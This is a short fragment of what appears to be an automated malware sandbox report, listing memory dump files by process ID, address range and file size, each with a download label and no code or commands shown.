    • memory/3688-68-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4500-69-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4500-70-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4500-66-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4576-67-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/4576-65-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/4576-72-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/5056-20-0x00007FFCD3090000-0x00007FFCD3B51000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5056-18-0x00007FFCD3093000-0x00007FFCD3095000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5056-60-0x00007FFCD3090000-0x00007FFCD3B51000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5056-2-0x00007FFCD3093000-0x00007FFCD3095000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5056-14-0x00007FFCD3090000-0x00007FFCD3B51000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5056-13-0x00007FFCD3090000-0x00007FFCD3B51000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5056-8-0x00000267D00D0000-0x00000267D00F2000-memory.dmp

      Filesize

      136KB

      Download